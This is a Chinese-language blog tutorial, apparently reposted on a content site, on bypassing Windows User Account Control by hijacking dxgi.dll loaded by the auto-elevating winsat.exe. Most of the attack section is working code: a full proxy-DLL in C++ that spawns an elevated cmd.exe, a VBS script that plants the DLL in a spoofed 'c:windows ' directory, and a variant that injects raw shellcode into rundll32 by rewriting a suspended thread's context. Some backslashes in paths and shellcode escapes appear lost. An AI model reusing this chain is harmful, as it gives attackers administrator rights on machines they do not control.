0x11 uac简介
用户账户控制(User Account Control,简称UAC)是微软公司在Windows Vista及更高版本操作系统中引入的一种安全机制。其目的是通过提示用户授权应用程序访问硬盘驱动器和系统文件,来防止恶意软件损害系统。
UAC需要授权的操作包括:
配置Windows Update添加或删除用户账户更改用户账户类型更改UAC设置安装ActiveX控件安装或卸载程序安装设备驱动程序设置家长控制将文件移动或复制到Program Files或Windows目录查看其他用户的文件夹
效果如下:
UAC设置有不同的级别,具体设置如下:
为什么有些应用程序不需要UAC提示?
简单来说,因为这些应用程序可以自动提升权限(autoElevate)。这也是常见的UAC绕过方法之一。常见方法包括:
白名单提权机制 – autoElevateDLL劫持利用Windows自身漏洞提权远程注入COM接口技术
具有autoElevate属性的应用程序在启动时会自动以管理员身份运行。这些应用程序通常具有微软的数字签名,被认为是可信的。如果我们通过COM技术或DLL劫持这些应用程序,也能获得管理员权限,但这需要较高的分析成本和技术难度。
0x12 BypassUAC
接下来,我们将寻找具有autoElevate权限的应用程序,并通过DLL劫持来绕过UAC。关于DLL劫持的原理,网上已有许多相关的文章,这里不再赘述。
首先,使用以下命令查找具有autoElevate属性的可执行文件:
strings.exe -s *.exe | findstr /i autoelevate
我们选择了winsat.exe作为目标劫持程序。查看该程序加载的DLL,发现其会加载dxgi.dll。
下面是我们编写的DLL劫持代码,原理如下图所示(图源自国外):
可以通过dllexp查看DLL内的函数:
Imagine By Magic Studio
AI图片生成器,用文字制作图片
79 查看详情 
你可以自行编写所需的DLL,也可以使用自动化工具生成。经过多次尝试和团队wlpz师傅的指导,我们最终的目标是通过DLL劫持运行cmd.exe,主要代码如下:
# include "pch.h"#include #include #pragma comment(lib, "Wtsapi32.lib")# define EXTERNC extern "C"# define NAKED __declspec(naked)# define EXPORT EXTERNC __declspec(dllexport)# define ALCPP EXPORT NAKED# define ALSTD EXTERNC EXPORT NAKED void __stdcall# define ALCFAST EXTERNC EXPORT NAKED void __fastcall# define ALCDECL EXTERNC NAKED void __cdeclEXTERNC {FARPROC Hijack_ApplyCompatResolutionQuirking;FARPROC Hijack_CompatString;FARPROC Hijack_CompatValue;FARPROC Hijack_CreateDXGIFactory;FARPROC Hijack_CreateDXGIFactory1;FARPROC Hijack_CreateDXGIFactory2;FARPROC Hijack_DXGID3D10CreateDevice;FARPROC Hijack_DXGID3D10CreateLayeredDevice;FARPROC Hijack_DXGID3D10GetLayeredDeviceSize;FARPROC Hijack_DXGID3D10RegisterLayers;FARPROC Hijack_DXGIDeclareAdapterRemovalSupport;FARPROC Hijack_DXGIDumpJournal;FARPROC Hijack_DXGIGetDebugInterface1;FARPROC Hijack_DXGIReportAdapterConfiguration;FARPROC Hijack_PIXBeginCapture;FARPROC Hijack_PIXEndCapture;FARPROC Hijack_PIXGetCaptureState;FARPROC Hijack_SetAppCompatStringPointer;FARPROC Hijack_UpdateHMDEmulationStatus;}
namespace DLLHijacker{HMODULE m_hModule = NULL;DWORD m_dwReturn[17] = {0};inline BOOL WINAPI Load(){TCHAR tzPath[MAX_PATH];lstrcpy(tzPath, TEXT("dxgi"));m_hModule = LoadLibrary(tzPath);if (m_hModule == NULL)return FALSE;return (m_hModule != NULL);}FARPROC WINAPI GetAddress(PCSTR pszProcName){FARPROC fpAddress;CHAR szProcName[16];fpAddress = GetProcAddress(m_hModule, pszProcName);if (fpAddress == NULL){if (HIWORD(pszProcName) == 0){wsprintf((LPWSTR)szProcName, L"%d", pszProcName);pszProcName = szProcName;}ExitProcess(-2);}return fpAddress;}}
using namespace DLLHijacker;
void StartProcess(){STARTUPINFO startInfo = { 0 };PROCESS_INFORMATION procInfo = { 0 };WCHAR cmdline[] = L"cmd.exe";
CreateProcess(cmdline, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &startInfo, &procInfo);}
BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{DisableThreadLibraryCalls(hModule);if(Load()){Hijack_ApplyCompatResolutionQuirking = GetAddress("ApplyCompatResolutionQuirking");Hijack_CompatString = GetAddress("CompatString");Hijack_CompatValue = GetAddress("CompatValue");Hijack_CreateDXGIFactory = GetAddress("CreateDXGIFactory");Hijack_CreateDXGIFactory1 = GetAddress("CreateDXGIFactory1");Hijack_CreateDXGIFactory2 = GetAddress("CreateDXGIFactory2");Hijack_DXGID3D10CreateDevice = GetAddress("DXGID3D10CreateDevice");Hijack_DXGID3D10CreateLayeredDevice = GetAddress("DXGID3D10CreateLayeredDevice");Hijack_DXGID3D10GetLayeredDeviceSize = GetAddress("DXGID3D10GetLayeredDeviceSize");Hijack_DXGID3D10RegisterLayers = GetAddress("DXGID3D10RegisterLayers");Hijack_DXGIDeclareAdapterRemovalSupport = GetAddress("DXGIDeclareAdapterRemovalSupport");Hijack_DXGIDumpJournal = GetAddress("DXGIDumpJournal");Hijack_DXGIGetDebugInterface1 = GetAddress("DXGIGetDebugInterface1");Hijack_DXGIReportAdapterConfiguration = GetAddress("DXGIReportAdapterConfiguration");Hijack_PIXBeginCapture = GetAddress("PIXBeginCapture");Hijack_PIXEndCapture = GetAddress("PIXEndCapture");Hijack_PIXGetCaptureState = GetAddress("PIXGetCaptureState");Hijack_SetAppCompatStringPointer = GetAddress("SetAppCompatStringPointer");Hijack_UpdateHMDEmulationStatus = GetAddress("UpdateHMDEmulationStatus");
StartProcess(); }}case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH: break;}return TRUE;}
然而,我们遇到了一个问题:系统的DLL通常需要权限才能更改或移动。为了解决这个问题,我们找到了一个VBS脚本,可以帮助我们完成操作,代码如下:
Set oFSO = CreateObject("Scripting.FileSystemObject")Set wshshell = wscript.createobject("WScript.Shell")' Get target binary and payloadWScript.StdOut.Write("System32 binary: ")strBinary = WScript.StdIn.ReadLine()WScript.StdOut.Write("Path to your DLL: ")strDLL = WScript.StdIn.ReadLine()
' Create foldersConst target = "c:windows "target_sys32 = (target & "system32")target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End IfIf Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLLoFSO.CopyFile ("c:windowssystem32" & strBinary), target_binaryoFSO.CopyFile strDLL, target_sys32
' Run, Forrest, Run!wshshell.Run("""" & target_binary & """")
' Clean filesWScript.StdOut.Write("Clean up? (press enter to continue)")WScript.StdIn.ReadLine()wshshell.Run("powershell /c ""rm -r """"?" & target & """""""")
最终效果如下:
如果需要加载shellcode,可以修改其中的函数,例如如下所示:
void StartProcess(){unsigned char shellcode_calc[] ="xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52""x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48""x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9""x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41""x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48""x01xd0x8bx80x88x00x00x00x48x85xc0x74x67x48x01""xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48""xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0""xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4c""x24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0""x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04""x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59""x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48""x8bx12xe9x57xffxffxffx5dx48xbax01x00x00x00x00""x00x00x00x48x8dx8dx01x01x00x00x41xbax31x8bx6f""x87xffxd5xbbxf0xb5xa2x56x41xbaxa6x95xbdx9dxff""xd5x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb""x47x13x72x6fx6ax00x59x41x89xdaxffxd5x63x61x6c""x63x2ex65x78x65x00";TCHAR CommandLine[] = TEXT("c:windowssystem32rundll32.exe");CONTEXT Context;struct _STARTUPINFOA StartupInfo;struct _PROCESS_INFORMATION ProcessInformation;LPVOID lpBaseAddress;ZeroMemory(&StartupInfo, sizeof(StartupInfo));StartupInfo.cb = 104;if (CreateProcess(0, CommandLine, 0, 0, 0, 0x44, 0, 0, (LPSTARTUPINFOW)&StartupInfo, &ProcessInformation)) {Context.ContextFlags = 1048579;GetThreadContext(ProcessInformation.hThread, &Context);lpBaseAddress = VirtualAllocEx(ProcessInformation.hProcess, 0, 0x800u, 0x1000u, 0x40u);WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, &shellcode_calc, 0x800u, 0);Context.Rip = (DWORD64)lpBaseAddress;SetThreadContext(ProcessInformation.hThread, &Context);ResumeThread(ProcessInformation.hThread);CloseHandle(ProcessInformation.hThread);CloseHandle(ProcessInformation.hProcess);}}
最后,学习该方法时,我们发现作者整理了一份可劫持的系统表,地址如下:
https://www.php.cn/link/8500107a87fb6519162b221f50d23acf
有兴趣的可以尝试复现。
参考文章:
https://www.php.cn/link/60ca0083f9f3c57b8a91c3022d460c55
https://www.php.cn/link/2ea4096fb5cd947a1aeead6447a922a6
https://www.php.cn/link/eac53e141058c06737f091776b2e5462
以上就是bypassUAC && DLL劫持的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/787933.html
微信扫一扫 
支付宝扫一扫 
